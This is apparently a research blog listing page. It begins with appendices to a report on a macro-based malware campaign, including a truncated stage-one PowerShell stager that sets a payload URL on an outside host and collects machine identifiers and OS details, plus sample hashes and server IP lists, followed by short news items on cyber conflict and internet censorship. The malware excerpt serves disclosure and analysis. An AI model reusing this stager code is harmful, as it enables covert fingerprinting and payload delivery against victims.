Uncategorized

Keep Calm and (Don’t) Enable Macros: Appendices

Appendices See our original report here. Appendix A: Stage One PowerShell Command try {    $path = “%temp%”    $url = “http://adhostingcache.com/ehhe/eh4g4/adcache.txt”    $extension = “ps1”    $guid = (get-wmiobject win32_computersystemproduct).UUID    $tmp = get-wmiobject win32_operatingsystem    $osinfo = “{”    $osinfo = $osinfo + ‘”systemdirectory”:”‘+$tmp.systemdirectory+'”,’    $osinfo = $osinfo + ‘”buildnumber”:”‘+$tmp.buildnumber+'”,’    $osinfo = $osinfo + ‘”registereduser”:”‘+$tmp.registereduser+'”,’    $osinfo = $osinfo + ‘”serialnumber”:”‘+$tmp.serialnumber+'”,’    $osinfo […]

Appendix B: Samples

MD5 Country 946ea5bd506d1ad1d6fac3de1e010cd3 Egypt b520e9f198c365125d49e7894152eebb Hungary 8db7d5c8f282640b9cad55d8d2fa843d Italy 8527f71025a33d47275f6c145e099392 Italy 2f3222670d24071464e22e67921e423c Italy 16fefc84cef47090bcb459888ca4ee4a Italy a1d830653da9cd5daa5aa40239ec73ca Italy b732b34eb831308b58b8dcfc8130e547 Italy b9077ad27c77e0004782443bd5447f17 Italy 2192f9b0209b7e7aa6d32a075e53126d Italy cb8259668b17059f1078227995aad4c2 Italy a32e073132ae0439daca9c82b8119009 Italy 9c223cdebbd6870115a530869491a7a9 Kazakhstan 5ff61876e3fa55128554e413e77c3e55 South Korea bf080077d9d3c362e1f5c2b9e771fb8c Morocco 209a986d8e17d361424dc11ffc69511b Oman 2bd0b6ce1adc950e07ede94e18c9b726 Oman 6767becc4a72159f4306fdcbec723cc3 Oman 1e71cbf364fd05168a9ccaf435eb66e8 Saudi Arabia d115dd439788bf6344010aab606cb8d9 Saudi Arabia f8abcba6172d31a6602a85d7fcd30454 Saudi Arabia 6f2b145f3d078762daa7e0d33b18ad11 Saudi Arabia 23e93ac9b08487a2f0934d04ccd890d1 Turkey 66741da348171175d7be67b8b0e01318 Turkey […]

Appendix A: List of Servers

We redact the last octet of the 186 IP addresses below that matched any of our fingerprints since 1 February 2014. IP Country Owner 101.99.83.12 MY PIRADIUS NET 103.1.185.xxx AU MAMMOTH MEDIA PTY LTD 106.186.118.191 JP LINODE LLC 106.186.16.48 JP LINODE LLC 106.186.17.xxx JP LINODE LLC 106.186.20.84 JP LINODE LLC 106.186.21.100 JP LINODE LLC 106.186.22.xxx […]

War From Cyberspace by Richard Clarke

ON OCTOBER 1, just beyond the Beltway inside Fort Meade, a four-star general became the first head of America’s new Cyber Command. Subordinate to General Keith Alexander are the Tenth Fleet and the Twenty-Fourth Air Force. The fleet has no ships, and the air-force unit has neither aircraft nor missiles. Their weapons are ones and […]

News of Iran’s Detained ‘Blogfather’

After a long silence, there is suddenly news on the fate of Hossein Derakhshan, an influential Iranian blogger with Canadian citizenship who was detained in Tehran almost a year ago. From The New York Times

How we used the internet to tell the story of the internet

Our interactive people’s history of the internet brings together your stories, alongside our own research and video interviews with key figures. From The Guardian

President Obama on Cyber Security Awareness

President Obama this week issued a short video address discussing the importance of cyber security awareness. The three-minute clip offers little in the way of startling revelation or news. But it is probably the most the president has had to say publicly about the topic since May, when he delivered a 16-minute speech saying he […]

More Tibetans arrested in connection with Internet activities

Reporters Without Borders calls for the release of three young Tibetans from the village of Dara who have been held in Nagchu county since 1 October, when they were arrested in nearby Sogdzong county for allegedly sending information about Tibet to contacts abroad via the Internet. From Reporters Without Borders

Russia considers new Internet filtering technology

According to this article published on a Russian news-site Inbox.ru, Russia has moved one inch closer to the China-style system of filtering the Web. Russia’s Ministry of Communications has urged ISPs to start filtering “negative” Internet content in places that provide public access to the Internet (think cafes, libraries, etc). Such filters have already been […]

Internet Companies to Limit Government Censorship

The South Korean government is considering more ways to impose rules on Internet users, but some companies operating Web sites are resisting the heavy-handedness. From The Korea Times